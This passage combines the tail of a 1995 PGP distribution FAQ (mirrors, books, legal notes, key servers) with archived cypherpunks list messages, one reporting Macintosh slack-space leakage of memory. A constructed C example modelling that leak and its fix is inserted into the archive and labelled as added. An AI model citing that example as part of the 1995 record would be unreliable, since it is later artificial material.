
ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP

FI

ftp://ftp.funet.fi/pub/crypt

NL

ftp://ftp.nl.net/pub/crypto/pgp
ftp.nic.surfnet.nl/surfnet/net-security/encryption/pgp

NZ

ftp://ftphost.vuw.ac.nz
ftp://rs950.phys.waikato.ac.nz/pub/incoming/pgp (New Zealand ONLY)

SE

ftp://leif.thep.lu.se

TW

ftp://nctuccca.edu.tw/PC/wuarchive/pgp/

UK

ftp://ftp.demon.co.uk/pub/amiga/pgp
ftp://ftp.ox.ac.uk/pub/crypto/pgp
ftp://src.doc.ic.ac.uk/aminet/amiga-boing
ftp://unix.hensa.ac.uk/pub/uunet/pub/security/virus/crypt/pgp

USA

ftp://atari.archive.umich.edu/pub/atari/Utilities/pgp261st.zip (Atari)
ftp://ftp.leo.org/pub/comp/os/os2/crypt
ftp://wuarchive.wustl.edu/pub/aminet/util/crypt
ftp://ftp.netcom.com/pub/gr/grady/PGP_NOT_FOR_EXPORT/MacPGP262ca124.exe.sea.hqx
ftp://ftp.netcom.com/pub/gr/grady/PGP_NOT_FOR_EXPORT/MacPGP262ca124.src.sea.hqx

ZA

ftp://ftp.ee.und.ac.za/pub/crypto/pgp
    /pub/archimedes
    /pub/pgp
    /pub/mac/MacPGP


HOW CAN I GET PGP BY EMAIL?

If you have access to email, but not to ftp, send a message
saying "help" to

ftpmail@decwrl.dec.com,

mailserv@nic.funet.fi, or

ftp-request@netcom.com

To get pgp 2.6.2i by email:

Send a message to
pgp@hypnotech.com with your request in the
Subject: field.

Subject              What you will get

GET pgp262i.zip      MS-DOS executable (uuencoded)
GET pgp262is.zip     MS-DOS source code (uuencoded)
GET pgp262is.tar.gz  UNIX source code (uuencoded)


For FAQ information, send e-mail to

mail-server@rtfm.mit.edu with

send usenet/news.answers/ftp-list/faq

in the body of the message.


WHERE IS MACPGP?

ftp://ftp.csn.net/mpj/README.MPJ
ftp://ftp.confusion.net/pub/pgp/mac-pgp/README
ftp://highway.alinc.com/users/jordyn/mac-pgp/README
ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS


WHERE IS VAX PGP?

Get the full PGP distribution, then get VAXPGP262.TAR.Z from
the berkeley site for additional files needed to compile PGP
for the VAX and a precompiled version for VAX/VMS 5.5-2.


WHERE CAN I GET MORE PGP INFORMATION?

http://www.csn.net/~mpj
ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt
ftp://starfire.ne.uiuc.edu/preston/pgpquick.ps (and
pgpquick.doc)
http://www.prairienet.org/~jalicqui/
http://www.mit.edu:8001/people/warlord/pgp-faq.html
http://draco.centerline.com:8080/~franl/crypto.html
http://draco.centerline.com:8080/~franl/pgp/bug0.html
http://www.eff.org/pub/EFF/Issues/Crypto/ITAR_export/cryptusa_paper.ps.gz
http://www.eff.org/pub/EFF/Issues/Crypto/ITAR_export/cryptusa.paper
http://www.cco.caltech.edu/~rknop/amiga_pgp26.html
Email
pgp-help@hks.net
ftp://ds.internic.net/internet-drafts/draft-pgp-pgpformat-00.txt
ftp://ds.internic.net/internet-drafts/draft-ietf-pem-mime-08.txt
http://www.cis.ohio-state.edu/
ftp://ftp.csn.net/mpj/public/pgp/MacPGP262_manual.sit.hqx
http://www-mitpress.mit.edu/mitp/recent-books/comp/pgp-source.html
http://web.cnam.fr/Network/Crypto/ (in French)
http://web.cnam.fr/Network/Crypto/survey.html (in English)
http://www2.hawaii.edu/~phinely/MacPGP-and-AppleScript-FAQ.html
ftp://ftp.prairienet.org/pub/providers/pgp/pgpbg11.asc (Beginner's Guide)
http://pluto.cc.umr.edu/~steve/Privacy_Page.html/Where_is_PGP.html
http://www.netresponse.com/zldf
http://bookweb.cwis.uci.edu:8042/Orders/ubipgp.html
http://www.geopages.com/Athens/1802/pgpfaq.html
http://www.pgp.net/pgp
http://www.sydney.sterling.com:8080/~ggr/pgpmoose.html
Beginner's Guide: send email to
slutsky@lipschitz.sfasu.edu, subject: bg2pgp


WHAT ARE SOME GOOD PGP BOOKS?

Protect Your Privacy: A Guide for PGP Users
by William Stallings
Prentice Hall PTR
ISBN 0-13-185596-4
US $19.95
This is a good technical manual for PGP for most users, and makes a better
reference than the "official" documentation that comes with PGP.  I recommend
it highly.

PGP: Pretty Good Privacy
by Simson Garfinkel
O'Reilly & Associates, Inc.
ISBN 1-56592-098-8
US $24.95

E-Mail Security: How to Keep Your Electronic Mail Private
"Covers PGP/PEM"
by Bruce Schneier
Wiley Publishing

The Computer Privacy Handbook: A Practical Guide to E-Mail Encryption, Data
Protection, and PGP Privacy Software
by André Bacard
Peachpit Press
ISBN 1-56609-171-3
US $24.95
800-283-9444 or 510-548-4393
This is an interesting book on the sociology and politics of privacy in the
computer age as well as a practical manual on using PGP.  Must reading for
all members of Congress, presidential staff, members of Parliament, and
ordinary citizens who would like to take reasonable steps to protect
themselves from some forms of crime that have been made easy by technology.

THE OFFICIAL PGP USER'S GUIDE
by Philip R. Zimmermann
MIT Press
April 1995 - 216 pp. - paper - US $14.95 - ISBN 0-262-74017-6 ZIMPP
Standard PGP documentation neatly typeset and bound.

PGP SOURCE CODE AND INTERNALS
by Philip R. Zimmermann
April 1995 - 804 pp. -
US $55.00 - 0-262-24039-4 ZIMPH
This is a handy printed reference with commented source code for PGP 2.6.2
with great educational value.  This is a great way to study some of the
computer science and information theory behind the world's best email privacy
tool without having either a computer or reams of printouts handy.
Recommended reading on long airline flights for serious students of computer
science and computer security.

Ordering information for the last two books:
Call US Toll Free 1-800-356-0343 or 617-625-8569.
Cite code 5CSC and number 661.
Allow 4-6 weeks for delivery within North America.
Allow 8-12 weeks for delivery outside of North America.

How to Use PGP, 61 pages,  (Pub #121) from the Superior Broadcasting Company,
Box 1533-N, Oil City, PA 16301, phone: (814) 678-8801 (about US $10-$13).


WHERE CAN I GET PGP LANGUAGE MODULES?

These are suitable for most PGP versions.


http://www.ifi.uio.no/~staalesc/PGP/language.html
ftp://ftp.ifi.uio.no/pub/pgp/doc/
German

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_german.txt
ftp://ftp.csn.net/mpj/public/pgp/pgp_german.txt
ftp://ftp.csn.net/mpj/public/pgp/PGP_german_docs.lha
ftp://ftp.informatik.uni-hamburg.de:/pub/virus/crypt/pgp/language/pgp_german.asc
ftp://ftp.leo.org/pub/comp/os/os2/crypt/pgp262i-german.zip

Italian

ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.italian.tar.gz
ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/PGP/pgp-lang.italian.tar.gz
ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.italian.tar.gz

Japanese

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_japanese.tar.gz
ftp://ftp.csn.net/mpj/public/pgp/pgp-msgs-japanese.tar.gz

Lithuanian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_lithuanian.zip
ftp://ftp.csn.net/mpj/public/pgp/pgp23ltk.zip

Norwegian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_norwegian.tar.gz
ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26i_norwegian.zip

Romanian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_romanian.tar.gz
ftp://ftp.encomix.es/pub/pgp/lang/pgp-romanian.zip
http://www.info.polymtl.ca/zuse/tavi/www/archive/ro_2.6.2.zip
http://www.info.polymtl.ca/zuse/tavi/www/archive/language.txt

Russian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_russian.zip
ftp://ftp.kiae.su/unix/crypto/pgp/pgp26ru.zip
ftp://ftp.csn.net/mpj/public/pgp/pgp26ru.zip

Spanish

ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.spanish.tar.gz
ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/pgp-lang.spanish.tar.gz
ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.spanish.tar.gz
ftp://ftp.encomix.es/pub/pgp/lang/pgp262i-spanish.zip

Swedish

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_swedish.txt
ftp://ftp.csn.net/mpj/public/pgp/pgp_swedish.txt


IS PGP MORALLY RIGHT?

PGP itself is morally neutral.  What you do with it is not.  Protecting
privacy, prevention of criminal theft, and taking due diligence to
protect certain business information (like credit card numbers,
customer lists, etc.) are good uses for PGP.  Concealing criminal
or other immoral activity is wrong.  You can fool the police some
of the time, but you can't fool God.


IS PGP LEGAL?

Pretty Good Privacy is legal if you follow these rules:

Don't export PGP from the USA except to Canada, or from
Canada except to the USA, without a license.

If you are in the USA, use either Viacrypt PGP (licensed
for commercial use) or MIT PGP using RSAREF (limited to
personal, noncommercial use).  Outside of the USA, where
RSA is not patented, you may prefer to use a version of
PGP (2.6.i) that doesn't use RSAREF to avoid the
restrictions of that license.

If you are in a country where the IDEA cipher patent
holds in software (including the USA, Canada, and some
countries in Europe), make sure you are licensed to use
the IDEA cipher commercially before using PGP
commercially.  (No separate license is required to use
the freeware PGP for personal, noncommercial use).  For
direct IDEA licensing, contact Ascom Systec.

Ascom Systec has taken over the distribution of IDEA
licenses effective April 1, 1995. Erhard Widmer is the
person responsible for the sales aspects, and Peter
Hartmann is responsible for the technical aspects. They
can be reached as follows:

Erhard Widmer,  Ascom Systec AG, Dep't. CMVV      Phone  +41 64 56 59 83
Peter Hartmann, Ascom Systec AG, Dep't. CMN       Phone  +41 64 56 59 45

Fax:            +41 64 56 59 90
e-mail:         IDEA@ascom.ch
Mail address:   Gewerbepark, CH-5506 Maegenwil (Switzerland)

Don't sell PGP based on Philip Zimmermann's source code in
North America unless you are reselling for Viacrypt (because
they have an exclusive marketing agreement on Philip
Zimmermann's copyrighted code). (Selling shareware/freeware
disks or connect time is OK).  This restriction might be
lifted with PGP 3.0, since it is a complete rewrite by Colin
Plumb.  Distribution and use restrictions on that version are
still to be determined.

If you modify PGP (other than porting it to another platform
or adapting it to another compiler), don't call it PGP (TM)
or Pretty Good Privacy (TM) without Philip Zimmermann's
permission.


WHAT IS PHILIP ZIMMERMANN'S LEGAL STATUS?

Philip Zimmermann is under investigation for alleged violation
of export regulations, with a grand jury hearing evidence.
There is speculation that the Feds are trying to make an
example of Phil through prolonged and expensive legal
proceedings, thus reaping a reward of Fear, Uncertainty, and
Doubt to discourage development and use of strong crypto in the
USA.

Even though people in this country are considered innocent
until proven guilty, there is a problem with the system in that
it can take lots of money for innocent folks to defend
themselves.  Because of the broad implications for freedom,
privacy, and the First Amendment of the U. S. Constitution in
this case, I implore all of you who can to help out with Phil's
rather significant legal and travel expenses involved in his
defense.  Phil is a nice guy with a wife and two children to
support, and he has done a great deal in his PGP social
activism to help all of us.

To send a check or money order by mail, make it payable, NOT to
Phil Zimmermann, but to "Philip L. Dubois, Attorney Trust
Account."  Mail the check or money order to the following
address:

Philip Dubois
2305 Broadway
Boulder, CO USA 80304
(Phone #: 303-444-3885)

To send a wire transfer, your bank will need the following
information:

Bank: VectraBank
Routing #: 107004365
Account #: 0113830
Account Name: "Philip L. Dubois, Attorney Trust Account"

To contribute using your credit card (secured with PGP), simply
compose a message in plain ASCII text giving the following: the
recipient ("Philip L.  Dubois, Attorney Trust Account"); the
bank name of your VISA or MasterCard; the name which appears on
it (yours, hopefully :-)); a telephone number at which you can
be reached in case of problems; the card number; date of
expiry; and, most important, the amount you wish to donate.
(Make this last item as large as possible.) Then use PGP to
encrypt and ASCII-armor the message using Phil Dubois's public
key, distributed with PGP 2.6.2.  E-mail the output file to
Phil Dubois (dubois@csn.org).
Please be sure to use a "Subject:" line reading something like
"Phil Zimmermann Defense Fund" so he'll know to decrypt it
right away.


WHERE CAN I GET WINDOWS & DOS SHELLS FOR PGP?

http://www.ifi.uio.no/~staalesc/AutoPGP.html
http://www.dayton.net/~cwgeib
ftp://oak.oakland.edu/SimTel/msdos/security/apgp22b.zip
ftp://oak.oakland.edu/SimTel/win3/security/pgpw40.zip
http://alpha.netaccess.on.ca/~spowell/crypto/pwf31.zip
ftp://ftp.netcom.com/pub/dc/dcosenza/pgpw40.zip
ftp://Sable.ox.ac.uk/pub
ftp://ftp.firstnet.net/pub/windows/winpgp/pgpw40.zip  <WinPGP's home site>
http://www.firstnet.net/~cwgeib/welcom.html
ftp://ftp.netcom.com/pub/ec/ecarp/pgpwind.zip
http://www.eskimo.com/~joelm (Private Idaho)
ftp://ftp.eskimo.com/~joelm
http://www.xs4all.nl/~paulwag/security.htm
http://www.LCS.com/winpgp.html
ftp://mirrors.aol.com/mir01/circa/pub/pc/win3/util/pwf31.zip
http://netaccess.on.ca/~rbarclay/index.html
http://netaccess.on.ca/~rbarclay/pgp.html
ftp://ftp.leo.org/pub/comp/os/os2/crypt/gcppgp10.zip
ftp://ftp.leo.org/pub/comp/os/os2/crypt/pmpgp.zip
http://iquest.com/~aegisrcs

Compuserve:
Library 3, European Forum.
Library 6, NCSA Forum
PCWorld Online Forum.
WUGNET Forum.
WinShare Forum

See also the BBS list for PGP, above.


WHERE CAN I GET THE MACPGP KIT?

ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGP_icons.sit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkitSources.sit.hqx
ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/MacPGPkit1.6.sit

OTHER MAC ADD-ONS

ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/ChainMail.0.7.sit
ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/Eudora->PGP Scripts1.5.sit
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/pgp/mac/AppleScripts


WHERE IS THE PGP 3.0 API DRAFT?

The (prelim. draft) PGP 3.0 API is at:

ftp://ftp.netcom.com/pub/dd/ddt/crypto/crypto_info/950212 pgp3spec.txt
All comments on it for the PGP 3.0 API Team should be sent to:
<pgp@lsd.com>


WHAT OTHER FILE ENCRYPTION (DOS, MAC) TOOLS ARE THERE?

PGP can do conventional encryption only of a file (-c option),
but you might want to investigate some of the other
alternatives if you do this a lot.  Alternatives include
Quicrypt and Atbash2 for DOS, DLOCK for DOS & UNIX, Curve
Encrypt (for the Mac), HPACK (many platforms), and a few
others.

Quicrypt is interesting in that it comes in two flavors:
shareware exportable and registered secure.  Atbash2 is
interesting in that it generates ciphertext that can be read
over the telephone or sent by Morse code.  DLOCK is a no-frills
strong encryption program with complete source code.  Curve
Encrypt has certain user-friendliness advantages.  HPACK is an
archiver (like ZIP or ARC), but with strong encryption.

A couple of starting points for your search are:

ftp://ftp.csn.net/mpj/qcrypt10.zip
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/file/
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/file/
(see ftp://ftp.csn.net/mpj/README for the ???????)
ftp://ftp.miyako.dorm.duke.edu/mpj/crypto/file/


HOW DO I SECURELY DELETE FILES (DOS)?

If you have the Norton Utilities, Norton WipeInfo is pretty
good.  I use DELETE.EXE in del110.zip, which is really good at
deleting existing files, but doesn't wipe "unused" space.
ftp://ftp.csn.net/mpj/public/del120.zip
ftp://ftp.demon.co.uk/pub/ibmpc/security/realdeal.zip


WHAT DO I DO ABOUT THE PASS PHRASE IN MY WINDOWS SWAP FILE?

The nature of Windows is that it can swap any memory to disk at
any time, meaning that all kinds of interesting things could
end up in your swap file.
ftp://ftp.firstnet.net/pub/windows/winpgp/wswipe.zip


WHAT EVER HAPPENED TO PGPfone(tm)?

PGPfone is in beta test for Macintosh users.  A Windows 95 version
is being developed.

http://web.mit.edu/network/pgpfone
ftp://net-dist.mit.edu/pub/PGPfone/README
ftp.hacktic.nl/pub/pgp/pgpfone


WHERE DO I GET NAUTILUS?

Bill Dorsey, Pat Mullarky, and Paul Rubin have come out with a
program called Nautilus that enables you to engage in secure
voice conversations between people with multimedia PCs and
modems capable of at least 7200 bps (but 14.4 kbps is better).
See

ftp://ripem.msu.edu/pub/crypt/GETTING_ACCESS
ftp://ripem.msu.edu/pub/crypt/other/nautilus-phone-0.9.2-source.tar.gz

ftp://ftp.csn.net/mpj/README
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/voice/naut092.zip

ftp://ftp.netcom.com/pub/mp/mpj/README
ftp://ftp.netcom.com/pub/mp/mpj/I_will_not_export/crypto_???????/voice/naut092.zip

ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS
ftp://miyako.dorm.duke.edu/mpj/crypto/voice/naut092.zip

ftp://ftp.dsi.unimi.it/pub/security/crypt/cypherpunks/nautilus

The Colorado Catacombs BBS 303-772-1062

ftp://ftp.ox.ac.uk/pub/crypto/misc


HOW DO I ENCRYPT MY DISK ON-THE-FLY?

Rather than manually encrypting and decrypting files, it is
sometimes easier (and therefore more secure, because you are
more likely to use it) to use a utility that encrypts or
decrypts files on the fly as you use them in your favorite
applications.  This also allows you to automatically encrypt
temporary files generated by your applications if they are on
the encrypted volume.

Secure File System (SFS) is a DOS device driver that encrypts
an entire partition on the fly using SHA in feedback mode.

Secure Drive also encrypts an entire DOS partition, using IDEA,
which is patented.

Secure Device is a DOS device driver that encrypts a virtual,
file-hosted volume with IDEA.

Cryptographic File System (CFS) is a Unix device driver that
uses DES.

http://www.cs.auckland.ac.nz/~pgut01/sfs.html
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/disk/
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/disk/
(see
ftp://ftp.csn.net/mpj/README for the ???????)
ftp://miyako.dorm.duke.edu/mpj/crypto/disk/
ftp://ftp.nic.surfnet.nl/surfnet/net-security/encryption/disk/
ftp://ftp.demon.co.uk/pub/ibmpc/secdev/secdev14.arj


EMAIL/PGP LINKS

http://cag-www.lcs.mit.edu/mailcrypt/ (EMACS LISP)


WHERE IS PGP'S COMPETITION?

RIPEM is the second most popular freeware email encryption
package.  I like PGP better for lots of reasons, but if for
some reason you want to check or generate a PEM signature,
RIPEM is available at ripem.msu.edu.  There is also an
exportable RIPEM/SIG.

ftp://ripem.msu.edu/pub/GETTING_ACCESS


HOW DO I PUBLISH MY PGP PUBLIC KEY?

Send mail to one of these addresses with the single word "help"
in the subject line to find out how to use them.  These servers
synchronize keys with each other.

pgp-public-keys@keys.pgp.net
pgp-public-keys@keys.de.pgp.net
pgp-public-keys@keys.no.pgp.net
pgp-public-keys@keys.uk.pgp.net
pgp-public-keys@keys.us.pgp.net
pgp-public-keys@burn.ucsd.edu
pgp-public-keys@pgp.cc.gatech.edu
pgp-public-keys@goliat.upc.es
pgp-public-keys@demon.co.uk
pgp-public-keys@dsi.unimi.it
pgp-public-keys@ext221.sra.co.jp
pgp-public-keys@fbihh.informatik.uni-hamburg.de
pgp-public-keys@jpunix.com
pgp-public-keys@kiae.su
pgp-public-keys@kr.com
pgp-public-keys@kram.org
pgp-public-keys@kub.nl
pgp-public-keys@nexus.hpl.hp.com
pgp-public-keys@pgp.ai.mit.edu
pgp-public-keys@pgp.barclays.co.uk
pgp-public-keys@gondolin.org
pgp-public-keys@pgp.dhp.com
pgp-public-keys@pgp.hpl.hp.com
pgp-public-keys@pgp.iastate.edu
pgp-public-keys@pgp.kr.com
pgp-public-keys@pgp.mit.edu
pgp-public-keys@pgp.ox.ac.uk
pgp-public-keys@pgp.pipex.net
pgp-public-keys@srce.hr
pgp-public-keys@sw.oz.au
pgp-public-keys@uit.no
pgp-public-keys@vorpal.com
pgp-public-keys@nic.surfnet.nl

WWW interface to the key servers:
http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
http://www-lsi.upc.es/~alvar/pks/pks-toplev.html

For US $20/year or so, you can have your key officially certified
and published in a "clean" key database that is much less
susceptible to denial-of-service attacks than the other key
servers.  Send mail to
info-pgp@Four11.com for information, or
look at
http://www.Four11.com/

PGP public keys which are stored on SLED's Four11 Key Server are
now retrievable by fingering UserEmailAddress@publickey.com.
Example:  My e-mail address is mpj@csn.org
finger mpj@csn.org@publickey.com

My key (mpj8) is at Four11.com, at
ftp://ftp.csn.net/mpj/mpj8.asc,
on the key servers, on my BBS, and available by finger.


WHICH FAQ IS THE OFFICIAL ONE?

The main alt.security.pgp FAQ is published by Jeff A. Licquia

<jalicqui@prairienet.org> and is available at

ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt

This shorter FAQ just covers a few of the most frequent
questions and points you to the main FAQ for more answers.
This file is

ftp://ftp.csn.net/mpj/getpgp.asc,

There are some other periodic FAQ-related postings, too, like
the miniFAQ posted by Andre Bacard, which is more about
promoting the use of PGP than where to get it or how to use
it.

FAQs are also posted to
news.answers and
alt.answers, and
archived at rtfm.mit.edu.


CAN I COPY AND REDISTRIBUTE THIS FAQ?

Permission is granted to distribute unmodified copies of this FAQ.  This
information is also in http://www.csn.net/~mpj, which you may link to or
adapt for use at your own web sites.
                 ___________________________________________________________
                |                                                           |
|\  /| |        | Michael Paul Johnson  Colorado Catacombs BBS 303-772-1062 |
| \/ |o|        | PO Box 1151, Longmont CO 80502-1151 USA   Jesus is alive! |
|    | | /  _   | mpj@csn.org aka mpj@netcom.com m.p.johnson@ieee.org       |
|    |||/  /_\  | ftp://ftp.csn.net/mpj/README.MPJ          CIS: 71331,2332 |
|    |||\  (    | ftp://ftp.netcom.com/pub/mp/mpj/README  -. --- ----- .... |
|    ||| \ \_/  | PGPprint=F2 5E A1 C1 A6 CF EF 71  12 1F 91 92 6A ED AE A9 |
                |___________________________________________________________|


-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAwUBMICOWPX0zg8FAL9FAQEO1AQAvLSMXX9J/nZ/4Wc/TTS9a60e+G5vbvTR
KU2+KixGhKfHkH5eb9mHwUtuDTiPJSRvnyfx0EOrgs7b5cC8hZsxKnlyfNnsvEG+
fdxGxy1h90L69CUVFD5CGvIbTlTo7a1xT5tYj/knqTO0OH4WOZVVh60uhGpuzevb
0+99R2mUJoA=
=H2Bc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 14 Oct 95 23:48:32 PDT
To: cypherpunks@toad.com
Subject: Re: PA Remailer Concerns
Message-ID: <199510150647.XAA25530@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone examined the legislative history associated with this statute?

I would be surprised if they were singling out anonymous remailers.  They may have had other concerns regarding phone abuse, e.g., long distance fraud.  

Then again, I could be full of it...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 15 Oct 95 00:26:07 PDT
To: cypherpunks@toad.com
Subject: Idea Futures
Message-ID: <aca6045f180210043fe9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:03 PM 10/14/95, s1018954@aix2.uottawa.ca wrote:
>On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote:
>
>>       I have a better idea.  How about an open market in break-in
>> software.  We crack Netscape and offer the crack code to the highest
>> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
>> outbid the competition by a factor of 2 to get the details of the hole.
>> Here's how it works:
>>
>Funny that you mention it, the other mailing list (or rather set of lists)
>I'm on is devoted to a just such market system. The Idea Futures home page
>is at http://if.arc.ab.ca/~jamesm/IF/IF.shtml. You'll find a few familiar
>faces.

Robin Hanson, who developed (so far as I know) the modern focus on idea
futures, was an active Bay Area person. His interests parallel ours, and I
think he was on the CP list for a while back in '92.

(Some of his game theory simulations--on betting markets and
preference-revealing--were a main inspiration for the "Crypto Anarchy Game"
I put on at the first Cypherpunks meeting in '92.)

--Tim May



Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sat, 14 Oct 95 21:44:05 PDT
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: Re: mental cryptography
Message-ID: <v02130502aca5e351623c@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Oct 1995, Nathan Loofbourrow wrote:
> Boy, and isn't it fun to receive all the bounce messages from every
> post to cypherpunks?

Part of the problem is his provider who is sending the bounce messages to
the list and not the list owner (as shown in the Sender Header).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 14 Oct 95 22:06:46 PDT
To: cypherpunks@toad.com
Subject: Macintosh [and perhaps other OS] Security Alert
Message-ID: <199510150505.BAA10774@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A number of months ago, I discovered that various Macintosh "unused
diskspace" wipe utilities (Norton, Burn) fail to wipe the unused
slackspace at the end of the last block allocated to a file. This leaves
NumberOfFiles*512Bytes/2 = several kB of recoverable data on your average
drive.

I had assumed that this data was left there by other files previously
using the same block. This would certainly be a problem. But I discovered
that matters are much worse. The Macintosh file system will always write
an entire block. The extra data can therefore not come from an old file.
It comes from the memory space immediately following the data to be
written. This is a very serious security risk. Your decrypted secret key,
ANYTHING in memory might be written to disk and remain there, unerasable
by disk wipe utilities.

I would appreciate some comments.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMICWfCoZzwIn1bdtAQFDyAF/QLI0RJQ/E2+wktITd+3SBCCB8L24Y/vV
rq0hPikG9pELYcC/bMwXvD+utoW/E8NQ
=IHqi
-----END PGP SIGNATURE-----
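
Added example (not part of the original message): a small C model of the behaviour reported above, in which a write rounded up to whole 512-byte blocks carries the bytes that follow the file data in memory into the file's slack, shown next to a zero-padded write and a slack wipe. The function names, the 300-byte file and the marker string are constructed for illustration and model no real file-system API.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BLOCK_SIZE 512u /* block size used in the message's estimate */

/* Bytes between the end of the file data and the end of its last block. */
size_t slack_bytes(size_t file_len)
{
    size_t rem = file_len % BLOCK_SIZE;
    return rem == 0 ? 0 : BLOCK_SIZE - rem;
}

/* Leaky model of the reported behaviour: the write is rounded up to whole
 * blocks and the extra bytes are taken from whatever follows the data in
 * memory. Returns bytes written to disk, or 0 if a buffer is too small. */
size_t write_blocks_leaky(uint8_t *disk, size_t disk_len,
                          const uint8_t *mem, size_t mem_len, size_t file_len)
{
    size_t total = file_len + slack_bytes(file_len);
    if (total > disk_len || total > mem_len)
        return 0;
    memcpy(disk, mem, total);
    return total;
}

/* Hardened model: only file_len bytes come from memory, padding is zeroed. */
size_t write_blocks_padded(uint8_t *disk, size_t disk_len,
                           const uint8_t *mem, size_t mem_len, size_t file_len)
{
    size_t total = file_len + slack_bytes(file_len);
    if (total > disk_len || file_len > mem_len)
        return 0;
    memcpy(disk, mem, file_len);
    memset(disk + file_len, 0, total - file_len);
    return total;
}

/* What a wipe utility has to do in addition to free-space wiping:
 * overwrite the slack of a file that is still allocated.
 * Returns the number of bytes wiped. */
size_t wipe_slack(uint8_t *disk, size_t disk_len, size_t file_len)
{
    size_t slack = slack_bytes(file_len);
    if (file_len + slack > disk_len)
        return 0;
    memset(disk + file_len, 0, slack);
    return slack;
}

/* Audit helper: number of non-zero bytes left in a file's slack. */
size_t slack_residue(const uint8_t *disk, size_t disk_len, size_t file_len)
{
    size_t slack = slack_bytes(file_len), n = 0;
    if (file_len + slack > disk_len)
        return 0;
    for (size_t i = 0; i < slack; i++)
        n += disk[file_len + i] != 0;
    return n;
}

/* Constructed scenario: a 300-byte file sits in memory directly in front of
 * a marker string standing in for sensitive data. mode 0 = leaky write,
 * 1 = padded write, 2 = leaky write followed by wipe_slack(). */
size_t demo_residue(int mode)
{
    static const char secret[] = "CONSTRUCTED-SECRET-MARKER";
    uint8_t mem[1024] = {0}, disk[1024] = {0};
    const size_t file_len = 300;

    memset(mem, 'A', file_len);
    memcpy(mem + file_len, secret, sizeof secret - 1);

    if (mode == 1)
        write_blocks_padded(disk, sizeof disk, mem, sizeof mem, file_len);
    else
        write_blocks_leaky(disk, sizeof disk, mem, sizeof mem, file_len);
    if (mode == 2)
        wipe_slack(disk, sizeof disk, file_len);
    return slack_residue(disk, sizeof disk, file_len);
}

int main(void)
{
    printf("slack for a 300-byte file: %zu bytes\n", slack_bytes(300));
    printf("residue, leaky write:      %zu bytes\n", demo_residue(0));
    printf("residue, padded write:     %zu bytes\n", demo_residue(1));
    printf("residue, leaky + wipe:     %zu bytes\n", demo_residue(2));
    return 0;
}
```
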




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 14 Oct 95 22:18:28 PDT
To: cypherpunks@toad.com
Subject: Re: Anguilla Cypherpunks Meeting
Message-ID: <199510150516.BAA10814@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.3.89.9510131114.A70910-0100000@aix2.uottawa.ca>,
s1018954@aix2.uottawa.ca wrote:

> Really? I thought except for income taxes, US laws only apply in American
> territory as opposed to applying to American people wherever they are (as 
> I heard Germany's does).

US laws not only apply to US citizens abroad, they apply to non-US citizens
living abroad. See Noriega.
